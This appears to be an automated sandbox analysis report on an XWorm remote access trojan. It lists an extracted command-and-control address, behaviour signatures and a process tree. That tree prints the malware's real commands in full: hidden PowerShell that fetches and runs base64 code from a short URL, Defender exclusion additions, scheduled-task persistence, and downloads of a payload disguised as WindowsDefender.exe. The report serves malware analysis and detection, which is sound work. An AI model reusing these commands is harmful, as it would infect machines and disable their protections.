Analysis
-
max time kernel
236s -
max time network
270s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
-
submitted
23-01-2025 17:58
General
-
Target
https://raw.githubusercontent.com/AmjadBalls/Ramizjaber12/refs/heads/main/d
Malware Config
Extracted
xworm
147.185.221.24:35724
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 10 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Blocklisted process makes network request 12 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 10 IoCs
-
Executes dropped EXE 14 IoCs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 6 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://raw.githubusercontent.com/AmjadBalls/Ramizjaber12/refs/heads/main/d1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffea10746f8,0x7ffea1074708,0x7ffea10747182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff64d975460,0x7ff64d975470,0x7ff64d9754803⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1144 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3088 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17843034467898281398,10139978555898611968,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1180 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {Start-Process powershell -WindowStyle Hidden -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command \"iex ( [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64S1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 27137 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a66c6f41-7164-4331-88c5-18c22abd95f2} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 27015 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c76298d1-9a76-4979-9c5d-bf8256ec9a24} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" socket3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3084 -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 3064 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d89ca3f8-6cf1-4ac1-88b1-66fa96a98241} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -childID 2 -isForBrowser -prefsHandle 3932 -prefMapHandle 2744 -prefsLen 32389 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d40dab7-4e3e-4d36-aa0e-4a34bc4e4cbf} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5048 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5044 -prefMapHandle 5040 -prefsLen 32389 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c1dbf5b-f383-4348-b659-10513176566e} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" utility3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 3 -isForBrowser -prefsHandle 5624 -prefMapHandle 5524 -prefsLen 27257 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {184f726d-2a64-407a-b200-b45c2812df00} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3008 -childID 4 -isForBrowser -prefsHandle 2992 -prefMapHandle 3000 -prefsLen 27257 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22c30381-8df5-49c0-8427-b5522821c8b9} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3020 -childID 5 -isForBrowser -prefsHandle 5948 -prefMapHandle 5952 -prefsLen 27257 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {475840bc-bfe8-4985-b3d9-2a7d897cc06c} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1412 -childID 6 -isForBrowser -prefsHandle 6136 -prefMapHandle 6132 -prefsLen 27257 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecba18fc-e231-4825-ae62-c2f9da5d8a4f} 6048 "\\.\pipe\gecko-crash-server-pipe.6048" tab3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "(iex ( [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((irm https://tinyurl.com/4m6sec8p)))) )"1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64'"2⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"2⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Public\Downloads\Discord.exe"C:\Users\Public\Downloads\Discord.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\Discord.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\GoogleChrome.exe"C:\Windows\SysWOW64\GoogleChrome.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\GoogleChrome.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleChrome.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Googlechromeupdater'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Googlechromeupdater'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Googlechromeupdater" /tr "C:\ProgramData\Googlechromeupdater"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\explorer.exe"C:\Windows\System32\explorer.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\explorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Googlechromeupdater'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Googlechromeupdater'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Googlechromeupdater" /tr "C:\ProgramData\Googlechromeupdater"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UpdateChecker.vbs"2⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/AmjadBalls/Ramizjaber12/raw/refs/heads/main/svchost.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.exe' -WindowStyle Hidden -Verb RunAs"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/AmjadBalls/Ramizjaber12/raw/refs/heads/main/svchost.exe' -OutFile 'C:\Windows\SysWOW64\WindowsDefender.exe'; Start-Process 'C:\Windows\SysWOW64\WindowsDefender.exe' -WindowStyle Hidden -Verb RunAs"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsDefender.exe"C:\Windows\SysWOW64\WindowsDefender.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/AmjadBalls/Ramizjaber12/raw/refs/heads/main/svchost.exe' -OutFile 'C:\Windows\System32\WindowsDefender.exe'; Start-Process 'C:\Windows\System32\WindowsDefender.exe' -WindowStyle Hidden -Verb RunAs"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
